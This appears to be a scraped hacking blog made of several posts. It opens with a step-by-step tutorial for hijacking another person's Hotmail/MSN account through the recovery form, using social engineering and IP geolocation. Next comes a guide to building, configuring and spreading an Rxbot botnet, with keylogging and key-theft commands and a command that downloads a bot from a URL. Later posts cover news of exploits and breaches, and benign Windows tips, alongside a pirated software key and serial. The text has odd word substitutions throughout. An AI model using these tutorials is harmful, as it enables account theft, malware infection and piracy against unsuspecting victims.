Its basically a way of getting your email back if has been stolen, but I have come to realise that this to can be used to gain access to someones msn. In other words, who ever sends you a email off a @hotmail, @live or @msn email, you can gain access to they are hotmail, no joke, follow the tutorial below.

Well, I don't know if you guys have found this yet, but I have known about it for a few months now.
Windows Live has a revert link, you go to this link, it will ask you questions such as your full name, etc. All the information you want can be recieved by a email of the victim, seven times the form has been filled in like it says on the tutorial, click send, 12 to 24 hours later you will recieve a email from Windows Live asking to put a new password for the victims email. It must be the easiest way to gain access to someones msn, yet not very someone knows about it, well, if you guys don't know about it, I will be happy to share it with you.

Tutorial:

What you will want?
Revert Link: https://support.live.com/eform.aspx?prod...ct=eformcs

Tutorial:

IP Get1.50 (MSN And plugin):
http://rapidshare.com/files/115918445/IPGet1.50.zip

2. The first box will ask you to fill in the persons full name. Basically use some social engineering to get them to email you. Seven times you recieve the email from them it should have there full name next to the contact you recieved it from for e.g: "Forename Surname".

1. To start off basically go to the revert link. You will see some form where you will want to fill in some information on the person you're going to revert, don't let the size of the form put you off since it takes about 5 mins to fill in.

3. Next it will ask you for the e-mail address for us to send a response explains it is self... put your email address in.

4. Below your email address it should ask for the Primary e-mail address/member ID associated with the account you're inquiring about. This is the email address of the person you want to revert.

5. It will then ask you for a date of birth. This makes you think you have no chance... All you want to do is use some social engineering seven times again to try and get they are year of birth no want for month or date. I personally have come to find that you don't want this, so I always put 1992 and it always seems to work.

6. Next is the country, this is simple to get. Don't forget Hotmail checks there information VIA the IP address last logged on the account, the same way they find this information on anyone. I will explain how to get there IP further in to this tutorial. Basically ask for the country or use the method further on in the tutorial.

7. It will then ask you for the state, Seven times again you can gain this information VIA the IP. This will also be explained later on in the tutorial.

8. Now you will want the ZIP or post code. This makes you think "oh there is no point i cannot get it", well you're wrong, it is simple to get, seven times again... I will explain further on in the tutorial how to get this. YOU ONLY NEED THE BEGINNING OF THE POST CODE!

9. It will ask you for the secret answer to your question. You won't want this fill this in with: "I cannot remember"

10. You now will be asked for the alternate e-mail, put the email you used in step 4.

Now you have this you can now fill the rest of the form out. Seven times you have the IP go to: http://ip-adress.com target on there there will be a link at the bottom. Click on it then a new page should come up with a small box, Put the IP in the box and click on locate IP or web-site. It should now come up with all the information you want.

11. Ok, this is the main part of the tutorial on how to gain most of the information VIA the IP, if you have MSN And, download the MSN And IP Get script and import it. Sign out of msn seven times imported then back in. All you want to do now to gain the IP address of your target is send them a file, wait for them to accept then cancle it or send them a voice clip. You should then receive a small pop up in the bottom corner of your screen showing the IP address and the email address of the person.

Fill in step 6 & 7 with the information shown from this IP.

To get the zip/post code of this zoom in on the map on the http://ip-adress.com and grab the closest street shown on the map to where the ip has been located. Now go onto google and type in the state shown and the street you zoomed in for for eg: London, Waterloo postcode then look it up. London, Waterloo should be SE1, Remember... YOU ONLY NEED THE BEGINNING OF THE POST CODE!

13. It will now ask you for the last date and time you successfully signed in, put "Today".

12. Keep http://ip-adress.com open for this step since you will now want the ISP (Web service provider shown).

Congrats! You have filled in all the information you want. To give you more of a chance of this revert working keep reading and fill in a small bit more information!

14. Scroll down a bit untill you see "Names of contacts in your Hotmail address book". Basically fill in the email address of a few ppl like 2-3 on there contact list (get people to add them if you don't know) and fill it in as shown:
example@domain.com, example@domain.com but obviously put in the information needed for YOUR own revert.

16. It will seven times again ask you for the names of contacts on your Messenger contact list. use the same information shown in step 14.

15. You will then be asked for subjects of any elderly mail that's in your hotmail inbox. If they play habbo basically put "Habbo" in this. Maybe if they have a ebay/paypal account, send a password reset email then put "Ebay" or "Paypal" in this box or maybe more than one.

17. You will now be asked for the messenger nickname (display name) copy the persons msn name you're reverting and paste it in to this box. Scroll down and click submit obviously.

Congratulations! You have now done the tutorial on how to revert someone's msn. wait 24 hours for the reply!
If you followed this tutorial properly you have a 99% chance of it working.

Read more >>

 i found a nice tut that helps u with the basics of the botnets

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:

Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Quote:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:



This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Read more >>

Microsoft late Tuesday confirmed the publication of exploit code for a serious code execution vulnerability in the File Transfer Protocol (FTP) Service in Microsoft Internet Information Services (IIS) 5.0, 5.1, and 6.0.
A security advisory from Redmond warned that the vulnerability could allow remote code execution on affected systems running the FTP service and connected to the Internet.

“While we have seen detailed exploit code published on the Internet for this vulnerability, we are not currently aware of active attacks that use this exploit code,” a Microsoft spokesman said in an e-mail.
From Microsoft’s advisory:

An attacker with write access in the FTP service could use this vulnerability to cause a stack-based overrun and execute arbitrary code in the context of the local system.In configurations of IIS where the anonymous user has write access, the attacker need not be authenticated.

The Microsoft Security Research & Defense blog offers more details:

The vulnerability is a stack overflow in the FTP service when listing a long, specially-crafted directory name. To be vulnerable, an FTP server would need to grant untrusted users access to log into and create that long, specially-drafted directory. If an attacker were able to successfully exploit this vulnerability, they could execute code in the context of LocalSystem, the service under which the FTP service runs.

Configurations at risk

The vulnerable code is in IIS 5.0 (Windows 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003). IIS 7.0 (Windows Vista, Windows Server 2008) is not vulnerable. IIS 6 is at reduced risk because it was built with /GS which help protect the service from exploits by deliberately terminating itself when the overflow is detected before attacker’s code runs. We have not seen exploit code for this vulnerability that is able to bypass the /GS protection.

Also, remember that only servers that allow untrusted users to log on and create arbitrary directories are vulnerable.

In the absence of a patch, Microsoft recommends that administrators prevent untrusted users from having write access to the FTP service. The advisory contains instructions to:

• Turn off the FTP service if you do not need it
• Prevent creation of new directories using NTFS ACLs
• Prevent anonymous users from writing via IIS settings

A video demonstrating the exploit is available here.  More details here.

Read more >>

The "Remote Registry" service enables remote users to alter registry setting on your computer. By default, the "Startup type" setting for the "Remote Registry" service may be set to "Automatic” or "Manual" which is a security risk for a single user (or) laptop computer user.
So, to make sure that only users on your computer can alter the process registry disable this "Remote Registry" service.

Here is how it can be completed:

1. Click Start and pick Control Panel from the Start Menu items.Note:
If you find difficulty in accessing the Control Panel in your computer,
CLICK HERE To Know the Different Ways To Access the Windows Control Panel

2. If your Control Panel is showing items in Classic View, find the icon named Administrative Tools and double click on it.

Alternatively if you are under Category View, click Performance and Maintenance and then Click Administrative Tools

3. Now double-click on Services applet which is used to start, stop and configure windows services on your computer. This open the service window listing all the windows services.
4. From the right pane of the Services Window, find the service named Remote Registry
5. Double-click the "Remote Registry" service which shows the Remote Registry Properties for your Local computer.

Now, press the Stop button first to stop the started service and then pick Disabled from the drop down menu under 'Startup Type' and click Apply->OK.

6.Close the "Services" window and restart your computer for the changes to take effect.

That's it!! you have disabled the "Remote Registry" service on your computer to prevent unauthorized changes to the process registry.

Read more >>

If you are using a GSM phone (AT&T or T-Mobile in the U.S.), you likely have a few more months before it will be easy for practically anyone to spy on your communications.
Security researcher Karsten Nohl is launching an open-source, distributed computing project designed to crack the encryption used on GSM phones and compile it in to a code book that can be used to decode conversations and any data that gets sent to and from the phone.

Karsten Nohl talks about his distributed computing, open-source AE/1 cracking project at the Hacking at Random conference.

(Credit: Hacking at Random)

he hopes that by doing this it will spur cellular providers in to improving the security of their services and fix a weakness that has been around for 15 years and affects about 3 billion mobile users.
"We're not generating a vulnerability but publicizing a flaw that's already being exploited very widely," he said in a phone interview Monday.
"Clearly we are making the attack more practical and much cheaper, and of course there's a moral query of whether we should do that," he said. "But more importantly, we are informing (people) about a longstanding vulnerability and hopefully preventing more systems from adopting this."
This weakness in the encryption used on the phones, A5/1, has been known about for years. there's at least one commercial tools that permit for decrypting GSM communications that range in price from $100,000 to $250,000 depending on how fast you want the program to work, said Nohl, who previously has publicized weaknesses with wireless clever card chips used in transit systems.
It will take 80 high-performance computers about one months to do a brute force attack on A5/1 and generate a large look-up table that will serve as the code book, said Nohl, who announced the project at the Hacking at Random conference in the Netherlands 10 days ago.
Using the code book, anyone could get the encryption key for any GSM call, SMS message, or other communication encrypted with A5/1 and listen to the call or read the data in the clear. If 160 people donate their computing resources to the project, it should only take one and a half months to complete, he said.
Participants download the program and one months later we share the files created with others, by BitTorrent, for instance, Nohl said. "We have no connection to them," he added.
Once the look-up table is created it would be available for anyone to use.
Distributed computing, which has long been used for research and academic purposes, like SETI@home, and which companies have built businesses around, not only solves the technical hurdle to cracking the A5/1 code, but it could solve the legal ones .
A few years ago a similar GSM cracking project was embarked on but was halted before it was completed after researchers were intimidated, possibly by a cellular provider, Nohl said. By distributing the effort among participants and not having it centralized, the new effort will be less vulnerable to outside interference, he said.
Nohl wasn't certain of the legal ramifications of the project but said it's likely that using such a look-up table is illegal but possession is legal because of the companies that openly advertise their tables for sale.
A T-Mobile spokeswoman said the company had no comment on the matter.
AT&T spokesman Mark Siegel said, "We take strange care to protect the privacy of our customers and use a variety of tools, lots of technical and some human approaches. I can't go in to the details for security reasons." he declined to elaborate or comment further.
Taking precautions
Carriers should upgrade the encryption or move voice services to 3G, which has much stronger encryption, Nohl said.
In the meantime, people can use separate encryption products on the phone, like Cellcrypt, or handsets with their own encryption, Nohl said. Amnesty International and Greenpeace are using phones with stronger encryption, for example, but it only works if both parties to a conversation are using the same technology, he said.
For data encryption there is good Privacy (PGP) for e-mail and virtual private network (VPN) program for connecting to a corporate network, he said.
The encryption problem is serious for people doing online banking, where banks are using text messages as authentication tokens. Banks should instead offer RSA SecurID tokens or send one-time pass phrases through regular mail, Nohl said.
"I reckon, potentially, this could have as much impact as the breaking of WEP (Wired Equivalent Privacy) had a few years ago," said Stan Schatt, security practice director at ABI Research. "That shook up the industry a bit."
As a result of breaking that encryption, enterprises were reluctant to rely on wireless LANs so the Wi-Fi Alliance pushed through an interim standard that strengthened the encryption method, he said.
"Vendors will jump in with interim solutions, like Cellcrypt," Schatt said. "Mobile operators themselves will have to jump in and offer additional levels of encryption as part of a managed service offering for people who want a higher level of encryption."
However, consumers aren't likely to want to pay extra for the boosted encryption strength, he said.
To snoop on someone's phone, a would-be spy would want to be within eyesight of the target, Schatt said. Or, spies could point a recording device in the direction of a building and grab whatever conversations were nearby, he said.
"If you stand outside a building of a competitor you could get conversations between product managers and about sensitive corporation information, like acquisitions," he said. "Corporations put even more sensitive information over their phones, in general, than we do over their e-mail."
 The project web page is here and the the talk with slides is here.
 source:cnet.com

Read more >>

This is a serious bug, it effects all Kernel versions released since May 2001! That goes all the way back to the early 2.4 versions.
It’s also exploitable according to the report – This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel (which I would assume to be root).
At least it only allows local priveledge escalation, if was a remote root exploit in the kernel..it would be a disaster.
Imagine all the Linux boxes out there connected to the net where the admin doesn’t update or read security resources.

Linux developers have issued a critical update for the open-source OS after researchers uncovered a vulnerability in its kernel that puts most versions built in the past eight years at risk of complete takeover.
The bug involves the way kernel-level routines such as sock_sendpage react when they are left unimplemented. Instead of linking to a corresponding placeholder, (for example, sock_no_accept), the function pointer is left uninitialized. Sock_sendpage doesn’t always validate the pointer before dereferencing it, leaving the OS open to local privilege escalation that can completely compromise the underlying machine.
“Since it leads to the kernel executing code at NULL, the vulnerability is as trivial as it can get to exploit,” security researcher Julien Tinnes writes here. “An attacker can just put code in the first page that will get executed with kernel privileges.”

A patch has been released, so if you have untrusted local users on your system UPDATE YOUR KERNEL NOW!
This is the second time this year there has been a serious exploit in the Linux Kernel, which in a way is good because it means people are looking at it critically.
The more bugs that get exposed, the more secure the Kernel and our operating systems become.

Tinnes and fellow researcher Tavis Ormandy released proof-of-concept code that they said took just a few minutes to adapt from a previous exploit they had. They said all 2.4 and 2.6 version since May 2001 are affected.
Security researchers not involved in the discovery were still studying the advisory at time of writing, but at least one of them said it appeared at first blush to warrant an immediate action.
“This passes my it’s-not-crying-wolf test so far,” said Rodney Thayer, CTO of security research firm Secorix. “If I had some kind of enterprise-class Linux system like a Red Hat Enterprise Linux…I would really go check and see if this looked like it related, and if my vendor was on top of it and did I need to get a kernel patch.”

I wonder if any more major bugs will be disclosed before the end of the year? The less Kernel updates that need to be carried out the better in my books.
Full technical details of the bug can be found here:
Linux NULL pointer dereference due to incorrect proto_ops initializations

Read more >>

n 18-year-old hacker with a history of celebrity pranks has admitted to Monday’s hijacking of multiple high-profile Twitter accounts, including President-Elect Barack Obama’s, and the official feed for Fox News. The hacker, who goes by the handle GMZ, told Threat Level on Tuesday he gained entry to Twitter’s administrative control panel by pointing an automated password-guesser at a popular user’s account. The user turned out to be a member of Twitter’s support staff, who’d chosen the weak password "happiness."
Cracking the site was easy, because Twitter allowed an unlimited number of rapid-fire log-in attempts.
"I feel it’s another case of administrators not putting forth effort toward one of the most obvious and overused security flaws," he wrote in an IM interview. "I’m sure they find it difficult to admit it."
The hacker identified himself only as an 18-year-old student on the East Coast. He agreed to an interview with Threat Level on Tuesday after other hackers implicated him in the attack.
The intrusion began unfolding Sunday night,  when GMZ randomly targeted the Twitter account belonging to a woman identified as "Crystal." He found Crystal only because her name had popped up repeatedly as a follower on a number of Twitter feeds. "I thought she was just a really popular member," he said.
Using a tool he authored himself, he launched a dictionary attack against the account, automatically trying English words. He let the program run overnight, and when he checked the results Monday morning at around 11:00 a.m. Eastern Time, he found he was in Crystal’s account.
That’s when he realized that Crystal was a Twitter staffer, and he now had the ability to access any other Twitter account by simply resetting an account holder’s password through the administrative panel. He also realized he hadn’t used a proxy to hide his IP address, potentially making him traceable. He said he hadn’t used a proxy because he didn’t think the intrusion was important enough to draw law-enforcement attention, and "didn’t think it would make headlines."
He said he decided not to use other hacked accounts personally. Instead he posted a message to Digital Gangster, a forum for hackers and former hackers, offering access to any Twitter account by request.
"I … threw the hack away by providing DG free accounts," he said.
He also posted a video he made of his hack to prove he had administrative access to Twitter.

President-Elect Barack Obama was among the most popular requests from Digital Gangster denizens, with around 20 members asking for access to the election campaign account. After resetting the password for the account, he gave the credentials to five people.

He also filled requests for access to Britney Spears’ account, as well as the official feeds for Facebook, CBS News, Fox News and the accounts of CNN correspondent Rick Sanchez and Digg founder Kevin Rose.  Other targets included additional news outlets and other celebrities. Fox won the hacker popularity contest, beating out even Obama and Spears.
According to Twitter, 33 high-profile accounts were compromised in all.
GMZ doesn’t know what the reset passwords were, because Twitter resets them randomly with a 12-character string of numbers and letters.
On Monday morning, the Twitter accounts belonging to Obama, Britney Spears, FoxNews and others, began sending out bogus messages.
Someone used the Obama account to send out a message urging supporters to click on a link to take a survey about the president-elect, and be eligible to win $500 in gasoline. A fake message sent to followers of the Fox News Twitter feed announced that
Fox host Bill O’Reilly "is gay," while a message from Britney Spears’
feed made lewd comments about the singer.
It was initially believed that the Twitter account hijackings were related to two phishing scams that surfaced over the weekend. But GMZ’s hack was unrelated.
Shortly after GMZ posted his original message to Digital Gangster, the site’s administrator deleted it, along with the responses from members asking for access to other accounts. But a subsequent thread on the site supports GMZ’s account of the hack.
GMZ said he didn’t access any of the high-profile accounts himself, and didn’t send out any of the bogus tweets.  He thinks he was in
Twitter a couple of hours before the company became aware of his access and locked him out.
Twitter co-founder Biz Stone confirmed for Threat Level that the intruder had used a dictionary attack to gain access to the administrative account, but wouldn’t confirm the name of the employee who was hacked, or the password. He also wouldn’t comment on how long the intruder was in the Twitter account resetting passwords before he was discovered.
"Regarding your other questions, I’d feel more comfortable addressing them once we’ve spoken to counsel because this is still ongoing," he wrote Threat Level in an e-mail.
Stone said that Twitter has already been contacted by the Barack
Obama campaign about the hack and has been in touch with everyone whose account was accessed by the intruders. He said Twitter had not had contact with the FBI or any other law enforcement agency.
"We’re waiting to hear back from our lawyer about what our responsibilities are about this and how to approach it," Stone said in a separate phone interview.
As for addressing the security issues that allowed the breach, he wrote in a follow-up e-mail that the company is doing "a full security review on all access points to Twitter. More immediately, we’re strengthening the security surrounding sign-in. We’re also further restricting access to the support tools for added security."
GMZ, who said he’s been hacking for about three years and is currently studying game development, said he conducted the dictionary attack using a script he wrote and used last November to break into the
YouTube account of teen queen Miley Cyrus.
That hack gained widespread attention when someone posted a video memorial to Cyrus on the account,  claiming Cyrus had died in a car accident. GMZ said a friend of his was responsible for the hoax.
GMZ said he’s used  the same dictionary attack to breach the SayNow accounts of Disney star Selena Gomez and other celebrities.
After YouTube blocked his IP and patched some vulnerabilities he was exploiting, he decided "for the fun of it (curiosity and self-entertainment) I’ll pen-test Twitter." He was "shocked to realize that there was no rate limit" to lock someone out after a specific number of failed password attempts.
He said he’d never even heard of Twitter until he saw someone mention it on YouTube.

source

Read more >>

A notice on underground cybercrime forum r00t-y0u.org on Thursday suggested the site had become part of a law enforcement sting operation. However hacker hijinks and mischief making seem equally likely explanations for the incident, at the time of writing.
r00t-y0u.org's home page has been replaced by an jpg image notice stating that the previous cybercrime activity on the site has been logged and will be passed on to appropriate law enforcement agencies. It's unclear who posted the advisory, which was spotted by security researcher Mikko Hypponen of F-Secure, or even whether it is genuine.
No law enforcement agency is identified on the notice.

Roots you, sir.

Chris Boyd, a security researcher at Facetime, and long time nemesis of s'kiddies, cautions that several underground hacking forums were defaced recently and the r00t-y0u incident might be related. Bearing this important caveat in mind, the notice on r00t-y0u.org states.

This underground form has been monitored by law enforcement - every post, private message and all registration information has been captured. All member IP addressed and have been logged and identification processes are now underway. The creation and distribution of malware, denial of service attacks and accessing stolen information are serious crimes.

The notice goes on to suggest arrests will follow.

Every movement on this forum has been tracked and where there is information to suggest a person has committed a criminal act, referrals will be forwarded to the relevant authority in each jurisdiction. There have already been a number of arrests as a result of current investigations. This message should serve as a warning not to engage in criminal activity.

Law enforcement infiltration of underground forums is rare but not unprecedented. The DarkMarket carder forum was famously taken over in a months-long FBI sting last year. Around 56 people worldwide were arrested over their involvement their activities on DarkMarket, which posed as a forum for identity thieves, carders, and other cybercrooks.

Read more >>

Port forwarding has always been a headache for basic computer users. I still remembered that I had quite a tough time trying to understand what is port forwarding and how do I get it to work by configuring port forwarding in my router. If you have a direct connection to your broadband using an ADSL modem, then you don’t need to worry about Port Forwarding.

 the simple port forwoding tool  which costs 15$ is now free

Simple Port ForwardingWindows 98, ME, 2000, XP, 2003, Vista, 2008 & Requires Internet Explorer 6.0 or higher
Currently the latest Simple Port Forwarding v2.0.2 works on the following routers:

(All Routers With Tomato v1 Firmware)

2Wire – 2701HG-D (Qwest Firmware)

Actiontec – GT701 v2 (Qwest Firmware)

Actiontec – GT701WG v2 (Qwest Firmware)

Actiontec – M1000 (Qwest Firmware)

Actiontec – MI424WR (Verizon FiOS Firmware)

Actiontec – R1520SU (Qwest Firmware)

Belkin – F5D7230-4 v9 (Belkin Firmware)

Belkin – G Plus MIMO F5D9230-4 v5 (Belkin Firmware)

Belkin – G Plus MIMO F5D9231-4 v1 (Belkin Firmware)

Buffalo – WZR2-G300N (Buffalo Firmware)

D-Link – DI-624 (D-Link Firmware)

D-Link – DIR-655 (D-Link Firmware)

Edimax – AR-7064 A (Edimax Firmware)

Edimax – BR6104K (Edimax Firmware)

Gnet – IP0006 (Gnet Firmware)

Linksys – BEFSR11 (Linksys Firmware)

Linksys – BEFSR41 (Linksys Firmware)

Linksys – BEFSR81 (Linksys Firmware)

Linksys – BEFSRU31 (Linksys Firmware)

Linksys – BEFW11S4 (Linksys Firmware)

Linksys – RT31P2 (Linksys Firmware)

Linksys – WAG354G (Linksys Firmware)

Linksys – WRT110 (Linksys Firmware)

Linksys – WRT150N (Linksys Firmware)

Linksys – WRT160N v2 (Linksys Firmware)

Linksys – WRT300N (Linksys Firmware)

Linksys – WRT310N (Linksys Firmware)

Linksys – WRT54G (DD-WRT v23 SP3 Firmware)

Linksys – WRT54G (Hyperlite Firmware)

Linksys – WRT54G (Linksys Firmware)

Linksys – WRT54G (Satori-4.0 Firmware By Sveasoft)

Linksys – WRT54G2 (Linksys Firmware)

Linksys – WRT54GL (Linksys Firmware)

Linksys – WRT54GS (Linksys Firmware)

Linksys – WRT54GX2 (Linksys Firmware)

Linksys – WRT54GX4 (Linksys Firmware)

Linksys – WRTP54G (Linksys Firmware)

Microsoft – MN-700 (Microsoft Firmware)

MSI – RG60G (MSI Firmware)

NetGear – DG834 v3 (NetGear Firmware)

NetGear – DG834G v2 (NetGear Firmware)

NetGear – RP614 v2 (NetGear Firmware)

NetGear – RP614 v4 (NetGear Firmware)

NetGear – WGR614 v5 (NetGear Firmware)

NetGear – WGR614 v6 (NetGear Firmware)

NetGear – WGR614 v7 (NetGear Firmware)

NetGear – WGR614 v9 (NetGear Firmware)

NetGear – WNR834B v2 (NetGear Firmware)

NetGear – WPN824 v2 (NetGear Firmware)

NetGear – WPN824 v3 (NetGear Firmware)

Nexxt Solutions – NW230NXT14 (Nexxt Firmware)

Sagem – FST3202 (Livebox Firmware)

Trendnet – TEW-632BRP (Trendnet Firmware)

 if your router is not in the list dont worry just take the screen shot and send the screen shot the author he will add your soon got to this page to add
[ Download Simple Port Forwarding v2.0.2 ]

HOW TO TEST IF YOUR PORTS ARE FORWARDED 

 DOWN LOAD THIS SOFT TO TEST TO CHECK 

 

[ Download Simple Port Tester ]

Read more >>

File transfers can be tediously slow in Windows and in this guide, we’ll take a look at two file transfer alternatives for Windows. The first program is Teracopy and the second is FastCopy. Each program is designed to significantly cut down the time it takes to copy files between devices and even on the same drive.

TeraCopy

TeraCopy has a very clean interface and integrates in with the Windows Shell well. Just select the files you want to copy and let TeraCopy do its thing. TeraCopy is fast and lets you pause transfers whenever you like, which is very useful if you need to transfer some other files quickly or if your CPU is busy and the transfer is slowing it down.

TeraCopy halves the time of average file transfers compared to Windows Explorer’s file transfer method; however, read on: FastCopy is very fast!
TeraCopy works with Windows Vista and XP and is free.

Download TeraCopy

Burst Copy
http://www.newfreedownloads.com/Windows-Utilities/File-Management/BurstCopy.html

Key
4166180537782184103725446022066481863030

58757680855936341698321792453 

Tera Copy 1.22

Copy & Paste this key to register:


LVUWAwRAAAQgJMmiehmdX7yjHnKa9s72AhAV2GtLjiomYWkHwg T1FA2dBKVjNZvM
g8k6osRrc29X4sBPgXn1xj34Si9Aws8VsrJKjQ1k/GvdHRwvPl zh5AA4T8Se7fib
fMjU7ejSToB/LkSoNy0DIsRQZTafx6mQ+pQxdygikYwuddhBHF Z+m3r1LxYJkv6f
Llm6CRvkZdTUSYyzFEGidf0+3W2NtGAax8znrShhHT6wH99km1 2RltylA8Bu2njh
WNbTxJXB90uXMrU91ethvc67iL0+/1DlADeuUj/IdXpZZbWdJO Hw8FB3Qa09nNZv
1fBFdoO57J7BtoG/6hZU0VdPQmlV3tGXbLQ5fSuK7ZO0sLhrOT oI+2GvH3f6nMY3
oo3Ait2KVjH6O1rjOh1rHAAAAAA=

FastCopy

FastCopy is a program that can be integrated with the Windows shell or run as a portable USB application. Fast copy speeds up file transfers dramatically and helps when shifting lots of data. I recently moved over 2TB between drives and the whole move took just under 4 hours. I estimate Windows Explorer would have taken at least 24 hours to move this data (quite a lot of small files.)
FastCopy also outperformed TeraCopy and at least halved the time it took to perform file transfers. With lots of small files, FastCopy blew TeraCopy out of the water; this program is really quick!
FastCopy works with Windows Vista and XP and is free.

Download FastCopy

The Verdict

FastCopy is definitely faster, but if you prefer better looks and a more usable GUI, then TeraCopy takes the win. If you want to pause transfers for reasons mentioned above, TeraCopy is the program for you. Each program has its own advantages and it will come down to user preference. Give them both a try and you decide.

Read more >>